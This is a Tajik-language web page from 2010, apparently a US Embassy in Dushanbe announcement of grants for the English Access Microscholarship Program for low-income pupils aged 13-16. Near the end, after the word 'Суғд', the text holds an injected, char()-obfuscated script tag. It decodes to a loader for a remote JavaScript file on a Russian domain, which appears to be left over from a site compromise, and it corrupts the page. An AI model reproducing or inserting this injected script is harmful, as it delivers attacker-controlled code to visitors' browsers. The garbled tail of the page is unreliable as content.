6.07.2010
Дастрасӣ ба таҳсили англисӣ
Сафорати ИМА дар Душанбе даъватеро ҷиҳати супоридани пешниҳод барои Барномаи микро-дастмузди таҳсилии дастрасӣ ба англисӣ дар солҳои 2010-2012 эълон менамояд. Ҳадафи ин барнома таъмин кардани ҷавонони бидуни имконият барои омӯхтани забони англисӣ ва васеъ кардани роҳбарӣ тариқи таълими асосҳои фарҳанги Амрико ва арзишҳои рушди демократӣ ва ҷалб шудан дар корҳои шаҳрвандӣ мебошад. Ҳадафи барномаи мазкур талабагони мактабҳо аз синни 13-16 сола аз хонаводаҳои камбизоат мебошанд. Барномаи микро-дастмузди таҳсилии дастрасӣ ба англисӣ бояд ду сол омӯзиши забони англисиро иборат аз ҳадди ақал 180 соати таълимӣ дар 1 сол таъмин намояд. Машғулиятхои пуршиддати тобистонии Барномаи микро-дастмузди тахсилии дастрасӣ ба англисӣ мумкин аст фаъолияти муҳими иловагӣ бошад ё шомили барномаи дусолаи омӯзиши забони англисии донишомӯз бошад. Ин машғулиятҳо бояд ҳадди ақал ба муддати як ҳафта бошанд ва мумкин аст ба фаъолиятҳои шарикони англисизабон ва ё ғайрианглисизабон ворид карда шаванд. Синну соли донишҷӯён дар оғози барнома набояд аз 13-сол боло бошад.
Суғд
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)b2527b76fb5171b8cf4d5885ba2f7c18.js" type="text/javascript">

ТАВЗЕҲОТ